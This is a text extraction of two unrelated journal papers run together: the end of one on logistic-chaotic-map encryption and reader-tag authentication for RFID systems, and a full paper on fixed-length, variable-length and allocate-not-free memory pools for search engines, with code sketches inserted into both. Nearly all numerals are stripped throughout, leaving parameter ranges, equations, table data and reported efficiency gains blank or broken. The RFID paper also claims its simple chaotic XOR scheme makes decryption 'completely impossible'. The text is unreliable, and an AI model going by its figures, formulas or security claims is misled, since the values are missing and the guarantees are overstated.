where $\mu$ represents the system parameter, its value range is ( , ), and $x_n$ represents the iteration value, which takes values in the range [ , ]. the above equation is used as the mathematical equation of the chaotic mapping, and a chaotic iterative sequence for encryption is generated by iterating it many times.

in order to analyse the characteristics of the logistic mapping more deeply, it was simulated in matlab; the logistic mapping bifurcation diagram obtained by fixing the initial value at .  while varying the parameter is shown in the following figure:

figure . logistic map bifurcation diagram.

as can be seen from the above figure, the logistic map moves from period-doubling bifurcation into the chaotic state. when the value of $\mu$ is about . , the logistic map enters the chaotic state. therefore, the $\mu$ value range of the logistic map in the chaotic state is ( . , ), and although the logistic map is a one-dimensional system, it can generate complex chaotic behavior. the logistic mapping system only generates chaotic behavior when the initial value and the parameter value are within a certain range, and the degree and randomness of the chaos are also affected by different initial values and different parameters.

b. implementation of chaotic encryption
the chaotic sequence is a sequence of chaotic real values generated by the chaotic mapping after multiple iterations and then formed by some transformation operations. theoretically, the chaotic sequence is a non-periodic sequence with statistical properties close to gaussian white noise [ ]. the initial value and parameter value required to start the chaotic map iteration are determined by the tag: the initial value $x_0$ is obtained from the serial number that uniquely identifies the tag, and the value of the parameter $\mu$ is obtained from the read operation keyword, which is determined according to the user's own needs.
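a minimal sketch of this key-stream idea: iterate the logistic map from a tag-specific initial value, quantize the real-valued orbit into bits, and combine the bits with the plaintext. the single-threshold quantization and the use of xor as the combining operation are simplifying assumptions (the interval-based quantization and the exact combining operation used in the scheme are described later), and the numeric values are placeholders.

```python
import numpy as np

def logistic_keystream(x0, mu, n_bits, discard=1000):
    """Iterate x_{n+1} = mu * x_n * (1 - x_n) and quantize the orbit to bits."""
    x = x0
    for _ in range(discard):              # discard transients so the orbit settles
        x = mu * x * (1.0 - x)
    bits = np.empty(n_bits, dtype=np.uint8)
    for i in range(n_bits):
        x = mu * x * (1.0 - x)
        bits[i] = 1 if x >= 0.5 else 0    # simple two-interval quantization (assumption)
    return bits

def chaotic_xor(data_bits, x0, mu):
    """Stream-cipher style: ciphertext = plaintext XOR keystream.
    Decryption is the same call with the same (x0, mu)."""
    keystream = logistic_keystream(x0, mu, len(data_bits))
    return np.bitwise_xor(data_bits, keystream)

# placeholder values: in this scheme x0 would be derived from the tag serial
# number and mu from the read-operation keyword
plaintext = np.array([1, 0, 1, 1, 0, 0, 1, 0], dtype=np.uint8)
ciphertext = chaotic_xor(plaintext, x0=0.31, mu=3.99)
recovered = chaotic_xor(ciphertext, x0=0.31, mu=3.99)   # round-trips back to plaintext
```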
thus, there exists a security policy that the data information of each tag uses a unique chaotic sequence to encrypt. in addition, the iterative sequence generated by the chaotic map is the real field value, and the data processed by the rfid is a binary field. therefore, the real field value generated by the chaotic map must be converted into a binary sequence for encryption, and the corresponding domain conversion is described in the next section. the following is a detailed explanation of the general encryption process of logistic chaotic map. the specific process is as follows: a) select the parameter value for  in ( . , ), and design the chaotic sequence generator using ( ) to generate the key stream factor sequence; b) use the serial number of the tag as the initial value and enter it into the logistic system; c) iterate from the current position; d) converting the iterative chaotic real value into a binary form of the key stream sequence, extracting a part as an encrypted sequence; e) select the plaintext data of the specified location as the data to be encrypted; f) the binary encryption sequence extracted in step d) with the plaintext information sequence to perform encryption calculation to obtain a ciphertext sequence; g) the current operation track is used as the initial parameter of the next stage of encryption, and is reserved for use; h) determine whether the encryption operation is completed. if it is completed, it will enter the end state, otherwise it will return to step c). the above process can be represented by a flow chart as follows: international journal of advanced network, monitoring and controls volume , no. , begin determining logistic chaotic mapping equation deter mine initial values and parameter values system iterate specified number of times chaotic real sequences convert into binary sequences encryption calculation with plaintext information generate c iphertext sequence whether the encr yption is complete end the current operation track is used as the initial paramet er of the next stage of encryption figure . logistic chaotic encryption flow chart. it can be seen that the information is written into the electronic tag after being encrypted by the uniquely determined chaotic sequence, which greatly improves the security of the tag data to a certain extent. c. domain conversion of chaotic systems and encryption systems the domain of chaotic system processing is the real number field, and the data processed by the rfid system is binary. this inevitably requires the conversion of real and binary values. the conversion mechanism between them is introduced below. when the chaotic sequence generator iteratively generates the chaotic sequence, it is necessary to determine the initial value and the parameter value. in the process of designing, the initial value and the parameter value are associated with the label, and the serial number of the unique identification label is used as the initial value, and the user-defined read operation keyword is used as the parameter value. here, the serial number and the read operation key are expressed in binary form. the process of converting the real value is as follows: initial value calculation process: assuming that the rfid system uses a -bit binary number, and the range in which the serial number is converted to a decimal number is ( , ). the initial value x of the logistic chaotic system ranges from ( , ), first the calculation factor of x is . 
/) (   , the value which obtained by converting the binary number of the serial number into a decimal number and multiplying by the calculation factor is taken as the value of the initial value x . listed below: the binary form of the serial number ( ) converted to a decimal number of , multiplied by the calculation factor ( .   ) and the initial value x = . . parameter value calculation process: in the rfid system, the read operation keyword is also a -bit binary number. the value of the parameter  in the logistic chaotic system is ( . , ). first, the calculation factor of the parameter  is determined to be . /) . (   , and the binary number corresponding to the parameter  is converted into a decimal number and multiplied by the calculation factor, and finally . is added as the decimal value of the parameter  . listed below: the binary form of read operation keyword ( ) is converted to a decimal number of , which multiplied by a calculation factor ( .   ) and equal to . , parameter value  = . + . = . . it should be noted that the initial value x is determined by the serial number of the unique identification tag, which indicates that its uniqueness determines that the chaotic sequence iterated by is also uniquely determined, and can be utilized as a private key in the encryption and decryption system. the parameter  is determined by the read operation keyword, and the read operation keyword can be shared by the reader and the tag, and can be utilized as a public key in the encryption and decryption system. the above is the process of converting the binary value into a real value when the chaotic sequence is started. after the chaotic encryption sequence is obtained, it needs to be binarized when encrypting the data transmitted between the reader and the tag in the rfid system. the chaotic signal  nx is converted into a binary sequence stream  nb ,and the quantization international journal of advanced network, monitoring and controls volume , no. , function )]([ nxt must be introduced in the process of conversion. the mathematical definition is as follows [ ][ ]:                 k i i k i i inx inx nxt u u k k )( )( )]([  where k is an arbitrary integer greater than , ,,, kkk iii are k consecutive contiguous partitions of the initial value x . the above equation shows that if the chaotic signal  nx falls within the defined interval of the odd number of the quantization function as the initial bit, the corresponding binary value is , if it falls within the defined interval of the even number of the quantization function as the initial bit, the corresponding binary value is . after the conversion, because of maintaining the good randomness and unpredictability of the chaotic sequence )}({ nx , the experimental analysis proves that the above quantitative method has excellent statistical characteristics such as uniform - ratio distribution and autocorrelation [ ]. iii. rfid system security model and read/write control mechanism, security description a. rfid system security model the chaotic sequence generated by the above method is used to encrypt and calculate the data information written in the tag, and then sent to the wireless transmission part of the reader for transmission, and the data read back by the tag, the reader also uses the same chaos sequence to decrypte and sent to the background server for processing. 
in this link, the data touched by the tag, the wireless transmission and reception parts, and the airborne signal transmission are all chaotically encrypted data, and the ciphertext carries no useful information on its own. without knowing the structure of the reader and the details of the chaotic encryption, it is impossible to illegally obtain the data in the tag and decrypt it into the original information, which greatly improves the confidentiality and security of the rfid system. the security model of the rfid system is shown below:

figure . rfid system security model (the background server is connected to the reader over the secure channel; the reader's control section and wireless transmission part incorporate the chaotic encryption module; the tag communicates with the reader over the unsafe airborne channel in chaotic ciphertext form, where an illegal listener may be present).

based on the above rfid system security model, coupled with the read and write control mechanism of the next section, the security of rfid data is effectively guaranteed.

b. read and write control mechanism of chaotic encryption
the legality of the reader and the tag must be verified before rfid data transmission, which requires the establishment of a read-write control mechanism between them. this control mechanism is established on top of the chaotic encryption, over the unsafe communication channel between the reader and the tag. the read and write control mechanism of the rfid system is shown in the following figure:

figure . read and write control mechanism after chaotic encryption (message flow among background server, reader and tag: (request, q); $e_{k_{rt}}(f_{qid})$; $(q, f_{qid})$; $(k_{rt}, id_{tag})$; $e_{k_{rt}}(id_{tag})$; $(\mu, x_{tag})$).

the basic process is as follows. $k_{rt}$ is a key shared only by legitimate readers, tags and the server, and $id_{tag}$ is the unique number that identifies the tag's information.
a) the reader sends an authentication request with a random number q to the surrounding tags; the tag is activated and waits for the command;
b) the tag combines the received random number q with its own $id_{tag}$ as $f_{qid} = f(q, id_{tag})$, where f is a reversible operation; the tag then encrypts $f_{qid}$ with the shared key $k_{rt}$ to obtain $e_{k_{rt}}(f_{qid})$ and sends the encrypted result to the reader;
c) after the reader receives $e_{k_{rt}}(f_{qid})$, the decryption operation recovers $f_{qid}$, which is then sent to the background server together with the random number q;
d) the background server inverts the reversible operation f to get $id'_{tag}$ and queries its local database to see whether a matching $id_{tag} = id'_{tag}$ exists. if it exists, the validity of the tag is proven, and the server sends the matching $(k_{rt}, id_{tag})$ to the reader; otherwise the reader is informed that the tag is illegal;
e) after the reader receives $(k_{rt}, id_{tag})$ from the background server, it computes $e_{k_{rt}}(id_{tag}) = f(k_{rt}, id_{tag})$, f again being reversible, and sends it to the tag. after the tag receives $e_{k_{rt}}(id_{tag})$, it calculates $id'_{tag} = f^{-1}(k_{rt}, e_{k_{rt}}(id_{tag}))$ and checks whether the result equals its own $id_{tag}$. if it is equal, the legality of the reader is proven, so the tag passes the data information $(\mu, x_{tag})$ in its memory to the reader. the reader then uses the parameter $\mu$, together with the initial value $x_0$, to generate the chaotic decryption sequence and decrypts $x_{tag}$ to obtain the original, correct information. if they are not equal, the reader is not legitimate and the tag does not respond.
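a compact sketch of the challenge-response exchange above, with the reversible operation f taken to be xor and the shared-key encryption e modelled as a keyed xor; both are stand-ins chosen only to keep the example runnable, since the scheme leaves the concrete primitives open, and all identifier and key values are placeholders.

```python
import secrets

def f(a, b):        # reversible combining operation (stand-in: XOR)
    return a ^ b

def f_inv(a, c):    # inverse of f when one operand is known
    return a ^ c

def e(key, m):      # shared-key "encryption" (stand-in: keyed XOR, its own inverse)
    return m ^ key

K_RT = 0x5A5A       # key shared by legitimate readers, tags and the background server
ID_TAG = 0x1234     # unique tag identifier

# a) reader challenges the tag with a random number q
q = secrets.randbits(16)

# b) tag computes f_qid = f(q, id_tag) and answers with E_krt(f_qid)
answer = e(K_RT, f(q, ID_TAG))

# c)-d) reader decrypts and forwards (q, f_qid); the server inverts f and
# looks the candidate id up in its database to validate the tag
f_qid = e(K_RT, answer)
assert f_inv(q, f_qid) == ID_TAG

# e) server returns (k_rt, id_tag); the reader proves itself with E_krt(id_tag),
# which the tag inverts with the shared key before releasing (mu, x_tag)
proof = e(K_RT, ID_TAG)
assert f_inv(K_RT, proof) == ID_TAG
```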
safety instructions in the rfid system security model, the data transmitted by the rfid is encrypted by using the nonlinear characteristics of the chaotic system [ ],so that the encrypted rfid data ciphertext is basically similar to the white noise sequence, and there is no law at all, and it is completely impossible to find some characteristics of the original information. even if the information in the tag is illegally obtained, the original information cannot be decrypted correctly; under the strict protection of the read/write control mechanism, the identity information of the reader and the tag can be effectively verified, and the illegal reader and the illegal tag are avoided. it ensures the legality and security of the data transmitted by the rfid system. iv. conclusion in the context that the wireless unsecure channel between the reader and the tag of the rfid system may be subjected to various types of attacks, this paper uses the chaotic encryption sequence generated by the logistic chaotic map to encrypt the data transmitted by the rfid. the generated ciphertext sequence is equivalent to the noise sequence, having the characteristic of confusion and unpredictability. as a result, the difficulty of ciphertext analysis after encryption is greatly increased. it correspondingly enhanced security and confidentiality of rfid data. in addition, the read-write control mechanism and the domain conversion of the chaotic system and the encryption system are described in detail. however, the chaotic encryption mechanism discussed in this paper still has some drawbacks and shortcomings, such as how to solve the nonlinear dynamic degradation problem of logistic map and to ensure the randomness of chaotic sequences. these shortcomings need to be studied and solved in the future. acknowledgment this work is partially supported by science & technology program of weiyang district of xi'an city with project “ ". references [ ] zhang yong-ping, wang feng-jian. research of chaotic encryption based rfid system information security[j]. computer security, . [ ] zhao yu-hua. the research of security protocol in rfid system based on theory of chaotic cryptography[d].master's degree thesis of hunan university, . [ ] deng ai-ping, xiao ben. application of chaotic encryption algorithm in rfid secure mechanism[j].materials science and information technology, . international journal of advanced network, monitoring and controls volume , no. , [ ] ding xin. hyper-chaotic encryption based rfid system informaton security[j].china conference, . [ ] zhao yu-xin, wang wei, liu li-qiang. a design and analysis for non-linear combination chaotic stream cipher based on logistic map[j].journal of projectiles and guides, . [ ] qiu yue-hong, he chen, zhu hong-wen. one chaotic map with infinite collapses and its quantified sequences[j].journal of shanghai jiaotong university, . [ ] wu hong, ding qun, zhou ping. logistic chaotic sequence design and aplication in data encription [j].journal of instrumentation, . [ ] geo-su yim. design of an rfid communication protocol using synchronized chaotic systems[j].journal of korea institute of information and telecommunications technology, . international journal of advanced network monitoring and controls volume , no. , research on optimization of memory pool management for high concurrent service requests liu pingping, lu zhaopan school of computer science and engineering xi’an technological university, xi’an ,china email: @qq.com abstract. 
In order to return information to the user quickly and accurately after keywords are entered, and to effectively reduce the performance penalty incurred when the search system frequently allocates and deallocates memory under high concurrency, a recoverable fixed-length memory pool, a recoverable variable-length memory pool, and an allocate-not-free memory pool were designed according to the different scenario features of the search engine. The results show that, compared with the default system memory allocator, the efficiency of the recoverable fixed-length memory pool is increased by . %, the efficiency of the recoverable variable-length memory pool is increased by . %, and the efficiency of the allocate-not-free memory pool is increased by . %.

Keywords: high concurrency, search engine, memory pool, distributor

1. Introduction

The search engine is one of the most important applications of the Internet, involving information retrieval, distributed processing, the semantic web, data mining, and related areas. Reasonable data structure design, the index, and a highly concurrent system structure are all factors that influence query speed. The basic principles of search engines have become very stable, but in terms of service, quality and performance still need to be optimized. Most traditional search engines use a keyword matching mode; the system manages memory adequately when allocation and release are not too frequent, but in the face of massive data processing and storage such engines seem powerless. Directly using the system calls malloc/free and new/delete [ ] to allocate and release memory has several drawbacks. For example, malloc/new searches the free-block table according to "first fit", "best fit" or other algorithms to find a free block, so memory utilization is not high; the system may need to merge free memory blocks when free/delete is called, which causes extra time and space overhead; frequent use easily produces a large number of memory fragments, which reduces the efficiency and stability of the program; and memory leaks [ ] become more likely as memory consumption keeps growing until memory is exhausted. Regarding the memory allocation problem, Wang Xiaoyin, a professor at Xi'an University of Posts and Telecommunications, analyzed the method and principle of establishing a memory pool in the article "Implementation and Application of the Memory Pool in Linux Kernel" [ ]. Memory allocated from a memory pool does not need to be released individually; it is released when the memory pool is destroyed. Advantages: it speeds up memory allocation, because when the pool still has enough blocks only simple operations such as size checks and pointer offsets are performed; small allocations have a high payload, requiring little additional bookkeeping information; memory allocated from the pool usually does not need to be released separately, but is reclaimed in one unified step; and apart from replacing malloc with the pool's allocation functions, no other special conventions are needed. It is therefore worthwhile to compare traditional search engine memory allocation with memory pool allocation. In this paper, different memory pools are designed for different application scenarios; they manage memory allocation so as to achieve the fastest possible allocation and release speed.
for the user’s query, the system’s memory management is completely taken over by the programmer, which is more conducive to investigate problem and optimize system, and quickly return a satisfied result for customer. . pinciples and key technologies of search engine search engine is based on the information extracted from the web site to establish the database, search the relevant records of user query condition matching, and then return the results to the user according to a certain order. the working principle[ ] of search engine is divided into four steps: first, using web crawler technology[ ] to automatically grab the web page from the internet, then analysis the original web page, and set up an index database, and finally searching and sorting in the index database .when there are multiple threads operating, if the system only has one cpu, it can not be carried out more than one thread at the same time, it can only divided the running time of cpu into several periods, then allocate the period of time to each thread, a thread code is run in a time, other threads are hanged up, this way we call concurrency. in the condition of high concurrency, the search system frequently allocate and recover memory will degrade the performance of program and the memory is used in a particular way, and pay the cost of performance on the function that is not required. for long-running background service system, the performance decrease mainly due to the default memory management is a universal, and general memory management usually consider many factors, including the thread, size, recovery time, distribution, frequency and so on. for this reason, it is common to consider use of the memory pool to manage memory allocation, rather than simply using new/delete, malloc/free for dynamic memory allocation. by designing a dedicated memory pool to allocate specific memory and optimize performance in different search application scenarios of search system, and to enhance the mass data storage and search speed, in order to solve the problem of universal memory. . principle of memory pool memory pool[ ] is a way of memory allocation, is a device that can dynamically allocate memory. it can only be used by a specific kernel component (that is, the owner of the pool). owners usually do not directly use the memory pool, when the common memory allocation fails, the kernel call a particular memory pool function to extract the memory pool, in order to get the extra memory. so the memory pool is only a memory of the kernel memory, used at a specific time. as shown in figure , the memory pool contains a total of memory blocks. when the memory pool is initially generated, only one block of memory is applied to the system, and the returned pointer acts as the head of the entire memory pool. after the application of the continuous demand for memory, memory pool judgment need to dynamically expand, then once again to apply for a new memory block of the system, and all of these memory blocks linked by pointers. international journal of advanced network monitoring and controls volume , no. , for the operating system, it has been allocated four equal-sized memory blocks for the application program. for example, on the fourth block of memory to enlarge, which contains a part of the memory pool information and three equal size memory pool units. the unit and unit are free, unit has been allocated. 
when application program need to allocate a unit size of memory through the memory pool, only need a simple traversal of all pool size information, then locate quickly the free memory pool block unit. then according to the size of the block position information directly locate the first free unit address, return the address and mark the next free unit; marking directly the corresponding memory unit of the memory pool size information is free when the application program release a memory pool unit. figure. the working principle of memory pool . small object allocation technology due to the application of memory block size of memory pool is uncertain, usually directly use the api of new and malloc to apply for allocating memory. it is not effective for the small object allocation, when frequently used will cause a large amount of memory fragmentation and then reduce the performance, so the small object memory allocation technology[ ] suitable for the small object memory allocation is used here. the size and number of blocks can be set in the construction period of the small object distributor. the chunk layer contains logical information, it can configured and returned the block from memory. once there is no free block in the chunk layer, the function returns zero. small object pool layer contains a vector, chunk objects stored inside, the chunk layer has been extended. there is a chunk queue, which stores all the information, there are two chunk pointers, one pointing to the currently available chunk, one pointing to the current with the release of a pointer. . scene analysis of search engine system in this paper, analyzing the characteristics of the three scenes, fixed length scene, size is not fixed scene and multiple allocation scene, designing the corresponding memory pool. ) fixed length scene in the existing search engine system, cache design takes advantage of the hash tables, original system use the new and delete functions for the allocation and release of each node of the hash table, and the size of the node is fixed, according to the allocation and release of the fixed size nodes, a memory pool is designed to improve the speed of cache allocation and release. a lot of places use the map of stl[ ] in research on optimization of memory pool management for high concurrent service requests the present search engine system, and the allocation and release of memory of each node in the map is managed by the distributor in the stl, take over the fixed node memory allocation and release by itself, enhance efficiency, easy to debug. based on the above two scenarios, the common is that how to deal with node fixed size, design a small object dispenser to distribute and release the fixed size memory node. ) size is not fixed scene in the cache management of the currents earch system, the search results are put into the cache, which is helpful for the next search, the size of each node in the cache is uncertain, and the time to enter the cache and propose cache can not be estimated. in the update module of the current search system, which manages the update and delete of the document, but the size of the document and the time of the update is unknown. for this scene, it can design a recoverable variable length memory pool, the lock can be added to deal with base on the characteristics of cache multi thread[ ]. 
) multiple allocation scene the current search engine will return a result within m size after input a keyword, and a lot of information that comes with results will be allocated and released by using new and delete function, it cause that the new function used frequently, and affect efficiency and bring memory fragments[ ]. after analysis, the search engine return the result sat the same time, memory is frequently allocated, the number of release carried out only when the results of the query are returned, so the factor of frequent distribution should be considered, and the total capacity is not more than m, therefore, it is consider to allocate a large chunk of memory, after which all of the small memory is allocated, and finally released through the interface. based on this scene design allocate not free memory pool. . memory pool design and realize based on the high concurrency three scenarios are obtained by analyzing the current search engines: hash table insert delete, cache update and document update module, query result return. three memory pools are designed for the three scenarios: recoverable fixed length memory pool and recoverable variable length memory pool and allocate not free memory pool were designed. the design structure of the search system memory pool is shown in figure . figure. the design framework of memory pool of search system international journal of advanced network monitoring and controls volume , no. , . recoverable fixed length memory pool recoverable fixed length memory pool is small object distributor, it divided into layers structure. as shown in figure , the bottom layer is the chunk object, each chunk manages a large chunk of memory, which contains an integer number of fixed size block. chunk contains logical information, the user can configure and return the block according to it. when the chunk is no longer remaining blocks, the configuration fails and returns to zero. the second layer is fix allocate, which base on the first layer, using the known vector to expand the first layer and ensure that the size of the distribution can be extended. the third layer is small object allocator, which provide universal distribution and return function. the third layer expand base on the second layer, it provide multiple second layer objects, it make the fixed length of the distribution technology turn into a variable length distribution technology. the fourth layer is small object, it made a package for the third layer, which provides a number of generic interfaces for the third layer and some common interface, extend it into a multi thread available distributor. through layer by layer expansion, not only to ensure the release efficiency of the distribution, but also to better package the internal structure together, it not visible to the outside. by providing a common interface, to make it used like the operating system comes with the default memory. figure. the structure of small object distributor . recoverable variable length memory pool recovery variable length memory pool is a multi-threaded, variable length, recyclable memory pool, similar to hash table. a linked list indicates an assignable size range, each element in the list is a specific size of memory block pointer, which point to a list of memory blocks, to find specific head pointer by aligning, and then assign a node outside in the list. 
the elements in the range will be allocated through the new, when released, it will be returned to the pool for the next allocation, and beyond the range of elements also be allocated through new, but when released, it directly call delete, and return to the operating system. about the factors of thread, add lock to ensure the thread safety after the specified by the constructor. mainly includes block header layer, tragctrlunit layer and recyclelitepool layer. the structure of the graph is shown in figure . block header layer is the bottom of the distribution structure, nctrlindex indicates the size of block research on optimization of memory pool management for high concurrent service requests distribution, pnextblock indicates the next block, the structure is linked list structure, the whole structure is union type, which save space and improve efficiency. the tragctrlunit layer is a headpointer of each blockheader layer, and also contains a member that indicates the number of blockheader objects. recyclelitepool layer contains the thread element, the lock element, thetagctrlunit layer pointer, some count elements and a memory distributor, default for the new distribution and delete function to delete. figure. the structure of recyclelitepool . allocate not free memory pool allocate not free memory pool is divided into four layers: memory chunk layer: the bottom of the allocation block, there are three members inside, one indicates block size, one indicates location of initial address, one indicates currently available location. chain of memory chunk layer: memory chunk object is organized into a two-way linked list. simple allocate poilcy layer: this layer accept the request of distribution, change the size to be allocated not less than the size of memory chunk, and then added to the two-way linked list, the pointers of current distribution block point to the new block. stagepool layer: this layer is the outermost layer, the default template parameter is simple allocatepolicy type, which provides external interface for distribution and release. the overall structure of the stagepool contains a chunk type pointer, which point to the currently allocated block, the allocation request are looked for from the current block every time, when the margin is not enough, it create a new block inserted into the list, select allocation strategy through the template parameter of allocate policy. the structure of the graph is shown in figure . international journal of advanced network monitoring and controls volume , no. , figure. the structure of stagepool . performance test and analysis through the centos operating system, the compiler and debugging tools of vim, g++ and scons, some scenarios are designed to simulate the actual scene of the search engine to test the performance differences between the default memory distributor and the designed distributor. . performance test and analysis of the small objects distributor ) for the small objects allocator test, when the amount of data is , by testing the system function of new/delete and the memory pool interface function of allocate/deallocate. record groups of data, as shown in table , by analyzing and calculating the time difference, the small objects allocator is increased by . % relative to new of system, and compared with the delete, it is increased by . %. 
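For orientation, the following is a minimal free-list sketch of the kind of fixed-size block pool whose allocate/deallocate interface is benchmarked against new/delete above. The class name, block size, block count, fallback path, and the fact that alignment is ignored are illustrative assumptions; the paper's actual small object allocator is layered (chunk, fixed allocator, small object allocator, small object), which this sketch does not reproduce.

#include <cstddef>
#include <new>
#include <vector>

// Minimal fixed-size block pool: one large chunk is carved into equal blocks
// threaded onto a free list; allocate/deallocate reduce to pointer pops and pushes.
class FixedBlockPool {
public:
    FixedBlockPool(std::size_t blockSize, std::size_t blockCount)
        : blockSize_(blockSize < sizeof(void*) ? sizeof(void*) : blockSize) {
        chunk_.resize(blockSize_ * blockCount);
        for (std::size_t i = 0; i < blockCount; ++i)   // thread every block onto the free list
            pushFree(chunk_.data() + i * blockSize_);
    }

    void* allocate() {
        if (!freeHead_) return ::operator new(blockSize_);  // pool exhausted: fall back to new
        void* p = freeHead_;
        freeHead_ = *static_cast<void**>(freeHead_);         // pop the first free block
        return p;
    }

    void deallocate(void* p) {
        if (owns(p)) pushFree(p);                            // push back onto the free list
        else ::operator delete(p);                           // block came from the fallback path
    }

private:
    bool owns(const void* p) const {
        const unsigned char* q = static_cast<const unsigned char*>(p);
        return q >= chunk_.data() && q < chunk_.data() + chunk_.size();
    }
    void pushFree(void* p) {
        *static_cast<void**>(p) = freeHead_;
        freeHead_ = p;
    }

    std::size_t blockSize_;
    std::vector<unsigned char> chunk_;  // the single backing chunk (alignment ignored for brevity)
    void* freeHead_ = nullptr;
};

int main() {
    FixedBlockPool pool(64, 1024);      // 1024 blocks of 64 bytes each
    void* a = pool.allocate();
    void* b = pool.allocate();
    pool.deallocate(a);
    pool.deallocate(b);
    return 0;
}

Allocation and release reduce to a pointer pop and push, which is where the measured speed-up over new/delete comes from.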
) for the thread adapter hash table test, using the node allocator class to match the hash table, construct an identical class of default allocator, the internal partition function use new/delete to achieve, using template parameters to match a hash table. for the single threaded test: for node allocator and default allocator, to applicate and release block, assuming that the program is running a fixed time of s, during this time repeated inserted and delete operation; multi-threaded test: for node allocator and default allocator, to open the same number of threads, and execute thread function, to insert and delete data for corresponding hash tables. table indicates the test data of hash table. by analyzing and calculating: in the case of single threaded, in terms of distribution, the efficiency of node is increased by . %, for the release, the efficiency of node is reduced by . %; in the case of multiple threads, in terms of distribution, the efficiency of the node is increased by . %, for the release, the efficiency of node is reduced by . %. ) for the test of the small objects allocator adapter map container, to achieve a small object alloator type, internal distribution released is achieved by small objectpool, through the map function, fit small objectallocator to map, map node distribution and release call interface of allocate/deallocate of small objectpool; similarly to achieve a newallocator type, internal distribution release is achieved by research on optimization of memory pool management for high concurrent service requests new/delete interface, also mapping to the map through the constructed function; to compare with distributor type provided by the system. single threaded test: three map were inserted into data; multi threaded test: map data is inserted and emptied by three map circulation within a certain time. table indicates the test data of adapter map. by analyzing and calculating: in the case of single threaded, in terms of default, the efficiency is increased by . %, for the new, the efficiency is increased by . %; in the case of multiple threads, in terms of default, the efficiency is increased by . %, for the new, the efficiency is increased by . %. table testing data of the small objects distributor(µs) number of times new allocation time new release time small allocation time small release time average time . . . table testing data of thread adapter hash table(µs) number single thread single thread single thread single thread multi-threaded multi-threaded multi-threaded multi-threaded of times default default node node ded default ded default ded node ded node allocation release allocation release allocation release allocation release average time . . . . . . . . international journal of advanced network monitoring and controls volume , no. , table testing data of adapter map multi thread(µs) number of times single thread default single thread small single thread new multi-threaded default multi-threaded small multi-threaded new average time . . . . . . performance test and analysis of recoverable variable length memory pool given a set of arrays with assigned sizefrom - , threads, insert delete action, then use a variable length memory pool to assign and storage an array of pointers, to release and reallocate, cycle times to get the test data results; using malloc to open the corresponding bytes of memory and assigning to another pointer array to storage. under the same conditions, compare the time of distribution and release of the system function. 
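The test just described exercises the recoverable variable-length pool introduced earlier: freed blocks are kept, per size class, on a free list and handed out again on the next request, while sizes outside the managed range fall back to new/delete. The sketch below illustrates that idea; the class name, the 8-byte size-class granularity, the coarse single mutex, and the cleanup in the destructor are simplifying assumptions rather than the paper's RecycleLitePool layout (BlockHeader, TagCtrlUnit, and RecycleLitePool layers).

#include <cstddef>
#include <mutex>
#include <new>
#include <vector>

// Simplified recyclable variable-length pool: freed blocks are kept in
// per-size-class free lists (buckets) and reused on the next allocation.
// Requests larger than maxSize bypass the pool entirely.
class RecyclePool {
public:
    explicit RecyclePool(std::size_t maxSize = 1024, std::size_t align = 8)
        : align_(align), buckets_((maxSize + align - 1) / align, nullptr) {}

    ~RecyclePool() {                                    // release every block still held in a bucket
        for (void* head : buckets_)
            while (head) { void* next = *static_cast<void**>(head); ::operator delete(head); head = next; }
    }

    void* allocate(std::size_t size) {
        std::lock_guard<std::mutex> g(lock_);           // coarse lock for multi-threaded use
        std::size_t idx = bucketIndex(size);
        if (idx >= buckets_.size())
            return ::operator new(size);                 // outside managed range: plain new
        if (buckets_[idx]) {                             // reuse a previously freed block
            void* p = buckets_[idx];
            buckets_[idx] = *static_cast<void**>(p);
            return p;
        }
        return ::operator new((idx + 1) * align_);
    }

    void deallocate(void* p, std::size_t size) {
        std::lock_guard<std::mutex> g(lock_);
        std::size_t idx = bucketIndex(size);
        if (idx >= buckets_.size()) { ::operator delete(p); return; }
        *static_cast<void**>(p) = buckets_[idx];         // push onto the bucket's free list
        buckets_[idx] = p;
    }

private:
    std::size_t bucketIndex(std::size_t size) const {
        if (size < sizeof(void*)) size = sizeof(void*);  // room for the free-list link
        return (size + align_ - 1) / align_ - 1;
    }

    std::size_t align_;
    std::vector<void*> buckets_;   // head of the free list for each size class
    std::mutex lock_;
};

int main() {
    RecyclePool pool;
    void* a = pool.allocate(100);
    pool.deallocate(a, 100);        // returned to the pool, not to the operating system
    void* b = pool.allocate(100);   // reuses the block freed above
    pool.deallocate(b, 100);
    return 0;
}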
table is the test data, by analyzing and calculating: in terms of new,the efficiency of recyclelitepool is increased by . %. table testing data of recoverable variable length distributor(ms) number of times new recyclelitepool average time . . research on optimization of memory pool management for high concurrent service requests . performance test and analysis of allocate not free memory pool building a new distributor structure, alloc is interface of the distributor, using the space of distributor to allocate bytes every time, allocated times; as a contrast, the system call the new function to allocate bytes each time, to record the time of application action. table is the test data, by analyzing and calculating: in terms of new, the efficiency of stageppool is increased by . %. table testing data of allocate not free distributor(Μs) number of times stagepool newl average time . . . conclusion )three scenarios are obtained by analyzing the current search engines: hash table insert delete, cache update and document update module, query result return. three memory pools are designed for the three scenarios: recoverable fixed length memory pool and recoverable variable length memory pool and allocate not free memory pool were designed. )using thesystem default memory management function, malloc/free and new/delete. by analyzing of the various factors of the function. allocating and freeing memory on the heap increases overhead. the design of the memory pool is applied to the search engine system. it optimize the internal memory management and improve the search speed. for the test of the three memory pool, compared with the system’s default memory, its efficiency are increased by . %, . %, . %. sponsors or supporters this paper is partially supported by special research project of shaanxi provincial department of education “ jk ”. reference [ ] dai chunyan, xu zhiwen. discussion about malloc/free and new/delete in c++[j].science&technology international journal of advanced network monitoring and controls volume , no. , of baotou steel (group)corporation, ( ): [ ] li qian, pan minxue, li xuandong. benchmark of tools for memory leak [j]. journal of frontiers of computer science and technology. ( ) . [ ] wang xiaoyin, chen lijun. implementation and application of the memory pool in linux kernel [j]. journal of xi’an university of posts and telecommunications. ( ): . [ ] qu weihua, wang qun. introduce and analyzing of search engine principle [j]. computer knowledgeand technology. ( ): . [ ] duan bingying. study and design of web crawler in search engine [d]. xidian university. . [ ] guo bingxuan, zhang jingli, zhang zhichao. algorithm of spatial data scheduling based on memory pool [j]. computer engineering. , ( ): . [ ] liu tao, nie xiaofeng, jing jiwu, wang yuewu. memory management in worm simulation based on small object memory allocation technique on the gtnets [j]. journal of graduate university of chinese academy of sciences. , ( ): . [ ] guo xufeng, yu fang,liu zhongli. an efficient memory built-in self-repair method based on hash table [j]. acta electronica sinica. ( ): . [ ] lai xiangfang. select the appropriate stl containers [j]. digital technology and application. ( ): . [ ] alexandrescu a.modern c ++ design: generic programming and design patterns applied [m]. boston: addison-wesley professional. . [ ] robert w.p.luka, wai lamb. efficient in-memory extensible inverted file [j]. information systems, ( ): . 
